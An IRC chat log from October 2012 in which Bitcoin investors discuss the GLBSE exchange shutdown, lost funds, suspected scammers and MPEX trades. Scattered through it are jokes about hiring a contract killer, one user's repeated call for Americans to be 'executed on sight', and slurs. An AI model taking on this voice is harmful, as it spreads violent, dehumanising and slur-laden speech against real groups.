Oct 15 07:42:38 smickles: did you see the email that went out today btw Oct 15 07:42:43 from glbse Oct 15 07:43:03 Azelphur: the one where it said, you should've received you btc? Oct 15 07:43:09 yep Oct 15 07:43:12 yeah, s2cm didn't get one satoshi Oct 15 07:43:13 Your GLBSE account has been processed for bitcoin. The next step will be to send you information about your assets, and to provide this information to issuers (if you agreed) allowing you to continue your relationship with your issuers. Oct 15 07:43:24 :( Oct 15 07:43:36 and we're owed over 200, iirc Oct 15 07:43:42 satoshis? Oct 15 07:43:46 yup Oct 15 07:43:50 oh nose :( Oct 15 07:43:55 that would be such a travesty to loose xD Oct 15 07:43:56 indeed Oct 15 07:44:03 it's a massive blow Oct 15 07:44:10 the economy will never recover Oct 15 07:44:14 we might as well pack up and go home now Oct 15 07:44:15 xD Oct 15 07:44:16 lol Oct 15 07:44:25 but we're too big to fail Oct 15 07:44:28 XD Oct 15 07:44:30 so it's ok Oct 15 07:44:31 lol Oct 15 07:44:35 bail outs all around Oct 15 07:44:45 I got my 10.1 btc out of glbse Oct 15 07:44:56 now I'm waiting on clipse, bs&t and glbse (assets) Oct 15 07:44:58 i put 20 btc's into nyan.a Oct 15 07:45:06 I had .6 btc liquid in glbse Oct 15 07:45:07 my bitcoin life is sad atm :( Oct 15 07:45:17 money trapped in investments: ~1700 btc Oct 15 07:45:20 money in wallet: 22.43 Oct 15 07:45:21 :< Oct 15 07:45:31 ouch Oct 15 07:45:34 indeed Oct 15 07:45:48 spread your money out, surely it can't all go wrong at the same time! Oct 15 07:45:51 #flawedlogic Oct 15 07:45:55 heh Oct 15 07:46:00 whats teh latest on clipse Oct 15 07:46:14 still 'end of october'? Oct 15 07:46:14 dub: seems like he's en route for a scammer tag Oct 15 07:46:22 dub: wasn't that end of september Oct 15 07:46:43 he said end of september, then he said 12th oct, and now he signed in but hasn't updated anyone Oct 15 07:46:48 I've seen no comms lately, I though he said end october then brought it forward Oct 15 07:47:03 Azelphur: go play some FTL, it'll help :) Oct 15 07:47:14 oh nope, you are right, it is end of october Oct 15 07:47:25 smickles: what were the outstanding shares for september? (looking at S^2 fin reports) Oct 15 07:47:43 although he says that in order to pay out in october he needs people to mine, and his pool has been down for nearly 24h now Oct 15 07:47:58 smickles: haha :p Oct 15 07:47:59 well, SA is a REALLY cheap place to have someone whacked ;) Oct 15 07:48:10 dub: tempting ;) Oct 15 07:48:15 like can of coke cheap Oct 15 07:48:27 I know people who live in SA too Oct 15 07:48:33 but nah Oct 15 07:48:33 thestringpuller: all issued shares were outstanding, and the number should be in the notes of the report Oct 15 07:48:39 I know a contract killer in SA :) Oct 15 07:48:43 lol Oct 15 07:48:49 sometimes I think it'd be cool if you could hire someone to steal a scammers car and sell it in order to pay back people who had been scammed, or something Oct 15 07:48:51 that would be cool Oct 15 07:49:00 thatd be awesome Oct 15 07:49:10 in my dreams sort of cool, not in reality Oct 15 07:49:13 xD Oct 15 07:49:16 smickles: thanks Oct 15 07:49:47 pirate would need a lot of fucking cars :D Oct 15 07:50:10 dub: it's really bad because in his thread early on he specifically says he don't invest in BS&T which is why I left so much in there, as another investment Oct 15 07:50:14 with pirate I'd steal his cimputers :) Oct 15 07:50:17 and now he blames BS&T for not being able to pay people back Oct 15 07:50:24 :@ Oct 15 07:50:30 in fact I can't believe someone hasnt Oct 15 07:50:38 haha Oct 15 07:50:41 thats grounds for an insta scammer tag Oct 15 07:50:53 noagendamarket: that's what I said in the scammer thread. Oct 15 07:51:02 [MPEX] [S.MPOE] 14900 @ 0.000419 = 6.2431 BTC [+] Oct 15 07:51:04 [MPEX] [S.MPOE] 15700 @ 0.00042 = 6.594 BTC [+] Oct 15 07:51:12 Azelphur: what is your asking price for 1 share of S^2? Oct 15 07:51:14 its no different to hashking or nckrazze Oct 15 07:51:50 "No I dont put the mining funds directly in BTCST" ... and now "aside from the fact BTCST should have paid out by now" Oct 15 07:51:51 xD Oct 15 07:52:10 thestringpuller: they did that 1/100 split now, so many zeros xD Oct 15 07:52:17 2.5 in "old money" Oct 15 07:52:29 so I think that's 0.025/share Oct 15 07:52:38 old money? Oct 15 07:52:39 lol Oct 15 07:52:44 they split the shares up by 100 I think Oct 15 07:52:57 so people with 1 shares got 100 shares Oct 15 07:53:01 so it could be traded easier Oct 15 07:53:08 smickles: it was 100 split right? Oct 15 07:53:12 yup Oct 15 07:53:17 yea, then 0.025/share \o/ Oct 15 07:53:21 and it was a good plan, util glbse folded Oct 15 07:53:25 the original value was 2.5 btcs? Oct 15 07:53:27 indeed Oct 15 07:53:30 wasnt there 95 000 shares ? Oct 15 07:53:41 it was at .12 last time I saw it Oct 15 07:53:43 91500, iirc Oct 15 07:53:56 or something :D Oct 15 07:53:57 thestringpuller: it was originally 2.5, then they split the shares up to make it easier to trade, so if I bought 1 share at the beginning at 2.5, I would have had 100 shares worth 0.025 now Oct 15 07:54:00 kinda thing. Oct 15 07:54:17 so there were 915 shares to begin with @ 2.5 Oct 15 07:54:22 1/100 split Oct 15 07:54:24 that's fine Oct 15 07:54:25 lol Oct 15 07:54:26 thestringpuller: what did you mean by 'original value'? Oct 15 07:54:27 yep, that sounds right Oct 15 07:54:38 the IPO value was 1.0 then they did a second issuing at 2.0 Oct 15 07:54:45 I sold a bunch of shares at 2.5 before the second issuing Oct 15 07:54:45 s2 originally launched with 500 shares at 1 Oct 15 07:54:53 er Oct 15 07:54:55 smickles: i was assuming the ipo was 2.5 Oct 15 07:54:56 sorry Oct 15 07:55:00 610 shares Oct 15 07:55:10 610 at 1 btc each at launch Oct 15 07:55:23 so each share increased in value... Oct 15 07:55:27 then issued 305 @ 2 (the market average) later on Oct 15 07:55:33 thestringpuller: my history with SS is basically, I bought a buttload at launch at 1.0, sold em all for between 1.8 and 2.5, then bought again at 2.0 in the second issuance Oct 15 07:55:44 then did a 100 for 1 split some time later Oct 15 07:55:48 I'm just doing analysis with my friend Oct 15 07:55:56 :) Oct 15 07:55:58 cause this seems like a good alternative to nyan.A Oct 15 07:56:05 I got buttfucked on Nyan.A Oct 15 07:56:12 yeah Oct 15 07:56:14 so i had to write it off Oct 15 07:56:20 I imagine it's not too much of an alternative now, as soon as GLBSE puts out the info it's shutting down anyway Oct 15 07:56:31 :( Oct 15 07:56:35 :( indeed Oct 15 07:56:46 back to the drawing board then Oct 15 07:56:48 thestringpuller: i'll be compiling the next reports tomorrow Oct 15 07:56:49 nefario still wants to get paid LOL Oct 15 07:56:58 so A) GLBSE puts info out and then you get bought out and it's over Oct 15 07:57:01 I guess I better start looking into what I want on mpex Oct 15 07:57:04 goodluckwiththat Oct 15 07:57:05 B) GLBSE doesn't put info out...and your screwed, forever. Oct 15 07:57:05 xD Oct 15 07:57:20 as much as I'd like to sell SS shares right now, gotta tell it like it is lol Oct 15 07:57:27 LOL Oct 15 07:57:53 heh, mpex is either options, or hardly anything else, but better anything else than glbse had Oct 15 07:57:58 imagine if you burnt your workplace down and asked the boss for your wages still lol Oct 15 07:58:02 (on the whole) Oct 15 07:58:12 noagendamarket: xD Oct 15 07:58:56 "I spent all the petty cash and theres no receipts" Oct 15 07:58:58 yeah, not that i know exactly what we're liquidating at, but buying SS @ 2.5 is probably a loss Oct 15 07:59:19 smickles: aim high and negociate lower ;) Oct 15 08:00:06 smickles: have you heard the zeekrewards and BS&T rumors? Oct 15 08:02:12 smickles: ofc Oct 15 08:02:20 anything new there? Oct 15 08:02:27 talking to yourself like a pro there :p Oct 15 08:02:37 but nope, nothing new Oct 15 08:03:48 I lefe things behind all the time Oct 15 08:07:22 f-ing mantis boarding parties Oct 15 08:07:41 howdy g Oct 15 08:07:59 nn a Oct 15 08:10:33 call and put options Oct 15 08:10:47 indeed Oct 15 08:11:25 ugh Oct 15 08:11:35 I might as well just make a business instead of trying to bu y one Oct 15 08:15:58 heh "Bitcoin is in fact first and foremost a wonderful community of highly skilled, intelligent and open minded people which tearfully reminds one of the old days of the pre-September Internet." heh Oct 15 08:16:11 the faq Oct 15 08:16:23 yea Oct 15 08:16:23 http://genius23.com/images/samples/BLACK-STONE-MONKEY.jpg this is bitcoin Oct 15 08:16:35 Pre-september internet... Oct 15 08:16:43 man i like that line from the faq Oct 15 08:16:49 thestringpuller: do you have an mpex account? they're expensive, although i thing coinbr.com setup a brokerage site for mpex Oct 15 08:17:03 oh yeah, it's a good line Oct 15 08:17:07 :) Oct 15 08:17:45 s/thing/think/ Oct 15 08:17:46 [MPEX] [S.MPOE] 31254 @ 0.00042 = 13.1267 BTC [+] Oct 15 08:17:54 [12:41:08] Diablo-D3: well, i dunno, we're disolving s2cm, but i'm launching an accounting company Oct 15 08:18:01 yeah, but to account what =/ Oct 15 08:18:36 Diablo-D3: i've got clients lined up :P Oct 15 08:18:41 smickles: not yet even though I could drop the cash on it I can't warrant the expenditure if I can't be sure I'll make the money back Oct 15 08:19:12 smickles: but our tiny little backwoods wall street wannabe is dead Oct 15 08:19:38 thestringpuller: well, to justify 30 btc, you'd probaby have to use margin and make a good call, eh? Oct 15 08:19:59 smickles: I'm not that good ;) I would have to have help for sure. Oct 15 08:20:00 Diablo-D3: so? Oct 15 08:20:03 [12:41:13] Everyone is closing their doors cause no one trusts anyone Oct 15 08:20:11 thestringpuller: yes, thats my reason to shut dmc Oct 15 08:20:27 I'll be patient and wait for more companies to ipo on mpex before I invest in an account Oct 15 08:20:32 every company Ive tried to invest in so dmc can get there faster has pretty much fucked us one way or another Oct 15 08:20:49 Don't shut down Oct 15 08:20:58 If you're good at mining I would invest in you :) Oct 15 08:21:01 thestringpuller: coinbr is probably for you then Oct 15 08:21:06 mining is dead, really Oct 15 08:21:11 is it? Oct 15 08:21:17 its no longer profitable Oct 15 08:21:24 the irony is DMC's plan made that moot Oct 15 08:21:31 we could have mined everyone else under the table Oct 15 08:21:39 Most hardware takes 32 weeks to pay off Oct 15 08:21:45 32~40 weeks Oct 15 08:22:01 but everyone decided to just be a bunch of faggots, so fuck it Oct 15 08:22:11 its not like you can invest in mt gox or bitinstant :P Oct 15 08:22:24 not that Im going to, but if I ever start another company, Im only going to deal with professional VC firms Oct 15 08:22:58 not a bunch of fucking aspies flailing their arms because they invested in something they didnt understand wouldnt pay out their original investment for 2+ years Oct 15 08:23:42 lol, Diablo-D3 don't vc firms look for 15x their original investment in 1 year? Oct 15 08:23:51 yep :P Oct 15 08:24:23 smickles: scammy ones? yes Oct 15 08:24:28 I can double my investment inn 2 years simply by buying a house and living in it lol Oct 15 08:24:45 smickles: theres a few that are fucking retarded, but they're known Oct 15 08:25:04 theres _no one_ in the bitcoin community who knows what they're doing Oct 15 08:25:47 smickles: yes that do, but they also think that if 15-20% of the companies they invested in give them that ROI it's a "good year" Oct 15 08:25:55 that = they Oct 15 08:26:18 Diablo-D3: smickles knows what he's doing Oct 15 08:26:27 thestringpuller: smickles didnt want to invest in dmc Oct 15 08:26:32 smickles also didnt have 200k btc. Oct 15 08:26:48 because he knew what he was doing he didnt invest in dmc Oct 15 08:26:48 you had 200k btc? Oct 15 08:26:56 no one had 200k btc. Oct 15 08:27:00 LOL Oct 15 08:27:27 noagendamarket: not at all, he didn't think the rest of the community could pony up the cash Oct 15 08:27:30 he was right, in the end Oct 15 08:27:48 so what happened to DMC Oct 15 08:27:56 glbse :P Oct 15 08:28:03 glbse. Oct 15 08:28:08 (I keep thinking DMC stands for the Delorean Motors Company) Oct 15 08:28:20 even though I know it stands for Diablo Mining Company Oct 15 08:28:30 Derp Mining Crapshoot Oct 15 08:28:46 DWMC Dude, wheres my company? Oct 15 08:28:57 http://piratetracker.info/ lol Oct 15 08:28:59 lol Oct 15 08:30:08 Diablo-D3: is your mining equipment paid for or is it for sell or... Oct 15 08:30:08 wtf Oct 15 08:30:15 ooh ooh Oct 15 08:30:24 Destroy My Capital Oct 15 08:30:27 the piratetracker address had 780 btc sent there lol Oct 15 08:30:31 1Fm8e4Zd5JVYZDDFkYzhrRjaGpZoCcngPT Oct 15 08:30:39 Delete My Coins Oct 15 08:30:44 http://blockexplorer.com/address/1Fm8e4Zd5JVYZDDFkYzhrRjaGpZoCcngPT Oct 15 08:30:48 bahahah Oct 15 08:31:03 yeah, but last transactions dates from March 2012... Oct 15 08:31:17 way before the website or pirate defaulted... Oct 15 08:31:39 lawyers like accountants are expensive Oct 15 08:32:15 Damage My Credibility Oct 15 08:32:26 ^ worked for Diablo-D3 Oct 15 08:33:03 Didnt Mine Coins :P Oct 15 08:33:06 oh shuddup dub Oct 15 08:33:32 Downvote My Comments, no thats his hn Oct 15 08:34:19 unless it paid above 5% no one was interested in any assets Oct 15 08:35:48 noagendamarket: yup Oct 15 08:39:09 #flawedlogic << how much did you have in mpex ? Oct 15 08:42:29 noagendamarket actually,t his is false. mpoe.etf made about 1200% over ipo price Oct 15 08:42:32 nobody bought it. Oct 15 08:42:38 people were just mentally retarded on glbse. Oct 15 08:42:50 [MPEX] [S.MPOE] 5911 @ 0.00041666 = 2.4629 BTC [-] Oct 15 08:42:51 [MPEX] [S.MPOE] 15636 @ 0.00041602 = 6.5049 BTC [-] Oct 15 08:47:05 mircea_popescu: does the bitcoin community really remind you of the pre-September internet? Oct 15 08:47:14 in parts. Oct 15 08:47:17 certainly not the forums. Oct 15 08:48:02 some people are unfortunately retarded Oct 15 08:50:57 forever september =/ Oct 15 09:05:07 Diablo-D3: Did you mine? Oct 15 09:06:15 no, I paid other people to do that Oct 15 09:09:09 [MPEX] [S.MPOE] 40073 @ 0.00042 = 16.8307 BTC [+] Oct 15 09:17:25 going to bed, night all Oct 15 09:34:17 [MPEX] [S.MPOE] 51600 @ 0.00041993 = 21.6684 BTC [-] Oct 15 09:42:27 [22:22] http://thecriminallawyer.tumblr.com/post/19810672629/12-i-was-entrapped :) Oct 15 09:42:40 That one is good too: http://thecriminallawyer.tumblr.com/post/29326904495/16-a-problems Oct 15 09:53:00 i kinda like the cora chick. Oct 15 09:54:50 Eh, what a surprise Oct 15 10:00:09 [MPEX] [S.MPOE] 54800 @ 0.00042 = 23.016 BTC [+] Oct 15 10:03:54 http://thecriminallawyer.tumblr.com/post/29326904495/16-a-problems Oct 15 10:03:58 whoa WHAT THE FUCKING HELL Oct 15 10:04:05 you can't have bird feathers ? Oct 15 10:04:11 fuck that bullshit country. Oct 15 10:05:31 There's TONS of silly laws in the US Oct 15 10:07:04 fuck that shit. Oct 15 10:07:07 the us is a rogue state. Oct 15 10:07:16 americans should just be executed on sight. Oct 15 10:07:49 ... Oct 15 10:08:10 But... Oct 15 10:08:16 a. i am going to pluck any bird i feel like ; b. i am going to make soup out of any turtle i get my hands on. Oct 15 10:08:18 They can be repaired! Oct 15 10:08:27 anyone doesn't like it better bring fucking enough ammo. Oct 15 10:08:35 who cares ? Oct 15 10:08:39 this is like the fucking zerg. Oct 15 10:09:29 But the zergling is all cuddly, grabbing you and nibbling at your internal organs. Oct 15 10:09:51 Embrace the zergling... Oct 15 10:10:27 no. Oct 15 10:10:34 americans. executed. on sight. Oct 15 10:10:38 it is now a crime to be american. Oct 15 10:12:22 I think the crime here is politicians rushing through new laws for their public opinion. Oct 15 10:12:55 i do not care. Oct 15 10:13:23 fucking muppets ranting on about what the sec bla bla ? Oct 15 10:13:30 fuck this shit. Oct 15 10:16:30 Also, did you know that those muppets might be making some of the criminal laws? Not all laws are voted by the representatives. Oct 15 10:17:10 Many regulations are made by expert in their fields but who have poor or no understanding of criminal law and it's intent. Oct 15 10:17:23 The website summarize the issue nicely. Oct 15 10:18:17 Although the problem of "broad/uncomprehensible laws" has been quite an issue globally, in many nations. Oct 15 10:18:19 it does. Oct 15 10:18:31 it also explains why the united states has no room and no place in civilised society. Oct 15 10:18:40 im sorry (well not really), but it was just expelled. Oct 15 10:18:56 can go hang out with gabon, sierra leone and the rest. Oct 15 10:25:12 [MPEX] [S.MPOE] 500 @ 0.00041993 = 0.21 BTC [-] Oct 15 10:30:04 Well, you seem to be overreacting to laws being too broad in the US by creating another broad law: Oct 15 10:30:04 [03:10] it is now a crime to be american. Oct 15 10:30:15 Are you sure you aren't part of the problem? Oct 15 10:30:18 this isn't a law. Oct 15 10:30:23 this is a matter of private policy. Oct 15 10:31:06 (really, i was mostly making a point, rhetorically) Oct 15 10:31:40 eh, and I wasn't really serious, just pointing out it was a rather harsh and excessive stance. Oct 15 10:32:06 no it's not. it's perfectly commensurate with the offence. Oct 15 10:32:49 Eh, "americans" are just born in the US, not a direct cause of everything that happens in the US Oct 15 10:32:49 people that dare organise into such a state are hostes humani gener Oct 15 10:32:56 universal public enemies. Oct 15 10:33:17 listen, if you're part of some mob cause "you grew up into it" you still go to jail. Oct 15 10:33:30 sword cuts both ways. Oct 15 10:34:14 Well that would be something applied too broadly... Not everyone in the US agree with the US. Oct 15 10:34:23 orly. Oct 15 10:34:27 are they paying tax to the us ? Oct 15 10:34:47 seems to me if you pay the mob boss you're in the mob, whether you *claim* disagreement or not. Oct 15 10:35:31 Depends on the individual. Most people in every country pays taxes. Doesn't mean they all support 100% of the state. Oct 15 10:35:52 yes, actually, it does, for this discussion. Oct 15 10:36:32 I don't see how you could reasonably expect someone who object to any single law in a country to be able to move somewhere that has no rules they disagree with. Oct 15 10:36:59 Unless everyone lived in their own one-man nation. Oct 15 10:37:04 you don't have to move. you just send them your citizenship in the mail and be done with it. Oct 15 10:37:17 being a us citizen is a crime in itself Oct 15 10:37:32 Except that doesn't really work that way... Oct 15 10:38:01 says who ? Oct 15 10:39:24 Since when will any government anywhere accept to take citizenship back and accept you stop paying any taxes? Tough luck on getting that through. Oct 15 10:39:54 not the same. Oct 15 10:40:02 you can renounce any citizenship, it's no big deal. Oct 15 10:40:13 if you're not a citizen and are paying taxes i dun care, you're not liable. Oct 15 10:40:35 i've paid taxes in maybe twenty jurisdictions so far, i don't see why anyone could claim i have anything to do with them. Oct 15 10:40:46 How do you even renounce citizenship? You never agreed to that. Oct 15 10:41:29 The state just decided by itself to consider you a citizen based on it's own set of rules, without your accord. Oct 15 10:41:50 nah. you were born one. your citizenship really predates any law other than the consitution Oct 15 10:42:01 peopel tend to forget the state is much ulterior in the process. Oct 15 10:42:50 I try to completly make abstraction of the state/whatever is in place and consider each individual individually for their own actions and intent. Oct 15 10:43:13 Regardless of their citizenship/government. Oct 15 10:43:47 If I see they support something I don't agree with, then I object. Oct 15 10:44:16 but they are actively engaged in a criminal entreprise Oct 15 10:44:21 (the us federal government) Oct 15 10:44:30 this is over their head, uneffaceable. Oct 15 10:45:29 us data : There were between 222-235 renunciants in 2008, between 731-743 in 2009, and about 1485 in 2010; In 2011, there were 1781 renunciants. Oct 15 10:45:43 can you 2 figure out how to "legalize" all the fake securities that are issued/promoted in the forum? At least you spend your energy on something useful :) Oct 15 10:45:56 That's like me saying you doing business like dinning out in a mob's restaurant is being actively engaged in a criminal enterprise. You have dealings with it, it doesn't mean you know or support what they do. You simply pay them for a service. Same with citizens paying taxes. Oct 15 10:46:31 I consider it payment for services. Oct 15 10:46:43 EskimoBob not really interested in forum bs "securities", but tell me more about the assets-otc lame mpex clone. Oct 15 10:47:01 BTC-Mining some may accept that argument. i do not. Oct 15 10:47:33 Now the issue is, there will be laws you don't agree with in every country. And pretty much every country charges taxes one way or another. Oct 15 10:47:54 mircea_popescu: sorr, let me rephrase thet: "legalize" all the fake securities that are issued/promoted in the mpex Oct 15 10:48:13 BTC-Mining im pretty happy with romanian laws so far. Oct 15 10:48:33 obviously not laws are perfect. what we're discussing here are laws that are criminal in themselves. Oct 15 10:49:31 I'm pretty sure if even if they don't abound, we could at least find a few falling under that definition of yours in romanian laws. Oct 15 10:49:42 please do. Oct 15 10:49:47 i'm happy with one, actually. Oct 15 10:49:56 can a law be criminal? Probably not but i sure can be absurd and instead of protecting people it harms them. But still, can you call it criminal? Oct 15 10:50:13 [MPEX] [S.MPOE] 17900 @ 0.0004165 = 7.4554 BTC [-] Oct 15 10:50:41 I'm afraid I don't have the skills required to do such legal research. Oct 15 10:51:33 In any case, I'm satisfied so far of canadian laws, although I'm pretty sure there's plenty I just don't know of. Oct 15 10:51:41 EskimoBob sure. nazi germany laws were criminal, and they created liability for loyal subjects of the 3rd reich. Oct 15 10:51:59 mircea_popescu: no, they are criminal now, but not back then Oct 15 10:52:06 well us laws are't criminal in the us. Oct 15 10:52:19 and most are not even criminal now days Oct 15 10:52:41 well most no. but most doesn't matter in this context. Oct 15 10:52:54 some are an' it's good enough for me. Oct 15 10:53:11 my point is, your example was a hyperbole Oct 15 10:53:56 US laws have turned in to a pile of shit and same happens all over the world Oct 15 10:54:29 Law is not for protecting society any more. Oct 15 10:54:39 nope, not the same, and not all over the world. this is just misguided jingoism. Oct 15 10:54:51 the insanity is quite speciffic to the us, with some overlap in the 51st state (uk) Oct 15 10:55:23 but yes my example was a hyperbole. problem is, it's a matching one Oct 15 10:55:46 Well, yes, many country are FAR from being in such a mess as the US. Oct 15 10:55:56 right. Oct 15 10:56:43 It doesn't mean the US is unrecyclable or that I'd hold every american responsible for the current situation however. Oct 15 10:58:45 the only way to get the lazy bums out of their bubble of confort and don't-give-a-shit Oct 15 10:58:53 is to put a gun loaded in their face. Oct 15 10:58:58 responsibility is something that kills you. Oct 15 10:59:19 so. all americans. strictly liable. for being part in the us war on mankind. Oct 15 10:59:28 to be executed on sight. Oct 15 11:00:57 Well I'm speechless Oct 15 11:01:42 hey, i'm kinda speechless too. Oct 15 11:02:11 If I applied that logic for anyone who is a citizen of a government I held responsible for crimes, I'd have to execute everybody on Earth, including myself. Oct 15 11:02:37 really ? Oct 15 11:02:48 like, for instance, the icelandic people ? Oct 15 11:03:24 or whatever, andorra. Oct 15 11:04:49 Simply for the fact no single government can be reasonably assumed to be 100% corruption free and applying laws correctly 100% of the time. Oct 15 11:04:58 this is a strawman argument. Oct 15 11:05:13 we're not putting the standard at either 100% corruption free or applying laws at all. Oct 15 11:05:30 we are putting the standard at not making laws which are enmitous to mankind. Oct 15 11:06:28 it doesn't even matter whether such laws are ever applied or were ever applied. the simple fact that htey exist is sufficient. Oct 15 11:06:40 Corruption in governments is almost always for making laws that are not bad for mankind. Oct 15 11:07:32 we're not discussing "bad for mankind". we are discussing, hostile to mankind. Oct 15 11:08:29 What I meant by bad. Oct 15 11:08:34 Harmful. Oct 15 11:09:30 yes, but is a difference between harmful and hostile. Oct 15 11:09:44 if i snipe at you while you sunbathe i am hostile, whether i hit you or not. Oct 15 11:10:00 if i take the parking spot you wanted, it may be bad for you, but there's no hostility involved. Oct 15 11:11:43 the latter isn't really harmful, just vaguely inconvenient. Oct 15 11:11:53 I'd class sniping someone as harmful. Oct 15 11:12:05 well, if i don't hit you, no harm done. Oct 15 11:12:19 harmful discusses effect. hostile discusses intent. Oct 15 11:12:35 I suppose. Oct 15 11:12:57 Seems more like it was an unagreement on definition of words. Oct 15 11:13:42 Even so, would you claim your government has done absolutly zero hostile acts toward mankind for all the time you were a citizen? Oct 15 11:14:43 you ever heard of romania starting a war ? Oct 15 11:14:50 they tried to prevent the one in serbia... Oct 15 11:14:51 bout all. Oct 15 11:15:41 Aye, but I'm pretty sure at some point, it caused harm to its own citizen under one law or another. Although I guess that's not a receivable argument. Oct 15 11:15:49 but anyway, this isnt a "oh im so much bettert than anyone else" thing Oct 15 11:15:56 im just trying to point out the immensity of us insanity Oct 15 11:16:12 I lack facts. But so do you against american citizens for merely being american citizen. Oct 15 11:17:06 [MPEX] [S.MPOE] 15319 @ 0.00041602 = 6.373 BTC [-] Oct 15 11:17:06 [MPEX] [S.MPOE] 8481 @ 0.00041526 = 3.5218 BTC [-] Oct 15 11:17:08 Also, since you consider intent, I suppose you wouldn't be against minors or infants who have no choice or knowing intent of causing such hostile acts. As such, why held adults responsible for inaction when they themselve are completly clueless. Oct 15 11:18:36 I'd consider their inaction as a poor choice, but would not consider them responsible. Oct 15 11:18:47 Purely personal opinion however. Oct 15 11:18:56 To each it's set of standards and ethics. Oct 15 11:34:01 Eh, guess that's it for today, 4:30 am already Oct 15 11:34:11 Goodbye. Oct 15 11:36:20 [MPEX] [S.DICE] 800 @ 0.00337 = 2.696 BTC [+] Oct 15 12:04:14 [MPEX] [S.MPOE] 10531 @ 0.00041526 = 4.3731 BTC [-] Oct 15 12:30:06 [MPEX] [S.MPOE] 33200 @ 0.00041533 = 13.789 BTC [+] Oct 15 12:45:42 https://bitcointalk.org/index.php?topic=115430.msg1273281#msg1273281 Oct 15 12:46:05 payouts progressing well Oct 15 12:46:21 alol Oct 15 12:46:29 lol* Oct 15 12:46:30 sarcasm! Oct 15 12:46:31 I LIKE IT! Oct 15 12:47:12 you've got to wonder at the thought process Oct 15 12:47:54 I wonder everyday how I am able to get dressed in the morning. Oct 15 12:48:15 my next goal is to learn how to read and write! :D Oct 15 12:56:07 [MPEX] [S.MPOE] 28788 @ 0.00041526 = 11.9545 BTC [-] Oct 15 12:56:08 [MPEX] [S.MPOE] 26999 @ 0.00041471 = 11.1968 BTC [-] Oct 15 12:56:27 Got the same email, didn't receive any of the bitcoin that I had there, not one iota. Oct 15 12:56:29 fun stuff. Oct 15 13:08:08 angry usagi is back :) and trolling like never before. #_# Oct 15 13:21:47 [MPEX] [S.MPOE] 1601 @ 0.00041471 = 0.664 BTC [-] Oct 15 13:21:49 [MPEX] [S.MPOE] 4799 @ 0.00041453 = 1.9893 BTC [-] **** BEGIN LOGGING AT Mon Oct 15 23:03:28 2012 Oct 15 23:04:18 smickles: sounds suspiciously like the ellet idea Oct 15 23:04:40 smickles must be MNW Oct 15 23:05:06 nowai ?! Oct 15 23:06:12 ellet? Oct 15 23:06:43 e-wallet Oct 15 23:08:53 so, coinbr now features imgur screenshot gallery.. with an exercise order that will make you dream Oct 15 23:09:23 jurov: is there a 'stop-loss' feature? Oct 15 23:09:50 imgur screenshot gallery ?! da fuck is that lol Oct 15 23:09:50 not yet Oct 15 23:11:29 by popular request... so that potential users can see it's not so scary as mpex Oct 15 23:11:48 there was even idea that i do beautified order book Oct 15 23:11:49 o o o lol Oct 15 23:12:09 jeez Oct 15 23:12:35 the blockchain taint tool indicates that usagi has hundreds of btc under his control Oct 15 23:13:10 dun dun dun Oct 15 23:13:22 EskimoBob: you still around? Oct 15 23:15:38 jurov is there an api? Oct 15 23:15:58 you want an api to talk to the thing which talks to my api ? Oct 15 23:15:58 wtf! Oct 15 23:16:21 people are set on breaking the internets Oct 15 23:16:31 thestringpuller, https://github.com/jurov/MPExAgent Oct 15 23:16:59 that needs mpex acct, tho. i don't see an coinbr api in near future. Oct 15 23:17:44 high frequency trading with multiple users on one mpex acct is just not feasible atm. Oct 15 23:18:50 why would you do high frequency trading w/o a 'maker rebate'? Oct 15 23:18:54 lol! i see Oct 15 23:19:17 i control things through bots mostly Oct 15 23:20:29 there's a lot of problems to be accounted for. it's difficult to make a secure api in the first place. even if you do, making a chain of two be comparably fast to one alone is not trivial. Oct 15 23:23:37 i'm baffled Oct 15 23:24:20 someone clearly violates a signed contract, and people accuse the violated party of scamming Oct 15 23:24:39 and it seems to happen so often Oct 15 23:24:40 details ?! Oct 15 23:24:46 [MPEX] [S.MPOE] 18000 @ 0.00040845 = 7.3521 BTC [+] Oct 15 23:25:02 mircea_popescu: https://bitcointalk.org/index.php?topic=118507 Oct 15 23:25:04 thestringpuller: wzz up? Oct 15 23:26:02 hm, contract says you have to use judge.me ? Oct 15 23:26:22 mircea_popescu: that's arbitration tho, this is not a dispute resolution Oct 15 23:26:30 there isn't even a dispute Oct 15 23:26:35 usagi admits default Oct 15 23:27:06 . Any controversy or claim Oct 15 23:27:35 how does that reach out to a scammer tag on bitcointalk? Oct 15 23:29:30 well, let's see. usagi doesn't admit default, in what he posts there ? Oct 15 23:30:50 he admitted it to me. but this is a side issue. agreeing to arbitration concerns the legal aspects of dispute resolution. not labels on a forum or private discussions Oct 15 23:30:52 now, it's not a matter of YOU being a scammer, or the disclosure being improper or anything Oct 15 23:31:04 but i can see how the forum people would go, well, come with a judge.me result first. Oct 15 23:31:32 (forum people = those doling out the tags) Oct 15 23:31:51 if they want the judge.me result for a scammertag, they are changing the way they do things Oct 15 23:32:13 why ? Oct 15 23:32:52 because i recall them giving scammer tags to people who agreed to judge.me resolution w/o there even being a claim filed Oct 15 23:33:55 EskimoBob: lets take down Usagi rough shim up. Oct 15 23:34:17 shim it out Oct 15 23:35:06 smickles a, that's good then. link ? Oct 15 23:35:11 (not me, them on the forum) Oct 15 23:35:30 and the scammer tag is a warning mechanism, not a settlement process, this augustocroppo was assusing me of breaking the contract by calling for a scammer tag Oct 15 23:35:47 don't worry about forumrates Oct 15 23:35:50 *forumrats Oct 15 23:36:07 mircea_popescu: oh, i'll look, but i don't feel confident i'll find it :| Oct 15 23:36:16 as mircea_popescu says, they are stuck in eternal september Oct 15 23:37:02 smickles pigeons prolly has it, i vaguely recall that name under the idiot tag. Oct 15 23:37:36 but as a general principle, it's hard to ask for any third party action on a contract with a dispute resolution clause that wasn't met. Oct 15 23:37:36 funny thing is, there are a few people who owe usagi btc who are willing to pay this debt, usagi just has to agree Oct 15 23:38:09 ah, at last Oct 15 23:38:18 A vanity bitcoin address Oct 15 23:38:26 that took a while Oct 15 23:38:31 what did you get? Oct 15 23:38:44 i thought vanity addresses were easy to generate? Oct 15 23:39:03 BTC-Mining either had bad luck, or low power Oct 15 23:39:16 or wanted 12 characters or somehthing Oct 15 23:39:18 I only have a 6950... Oct 15 23:39:20 depends on difficulty Oct 15 23:40:26 Difficulty was between 800 - 900 billion Oct 15 23:40:55 7 letter, case sensitive Oct 15 23:40:57 1Namjies9JeJ4ugCzjkAj6dbaWrtjAFKCk Oct 15 23:41:14 amjies lol Oct 15 23:41:24 I also wanted a number/capital letter following the letters Oct 15 23:41:41 Namjies* Oct 15 23:42:07 You do deserve a scammer tag, smickles. How do you dare to expect a payback on a bitcoin loan? That's scamming! 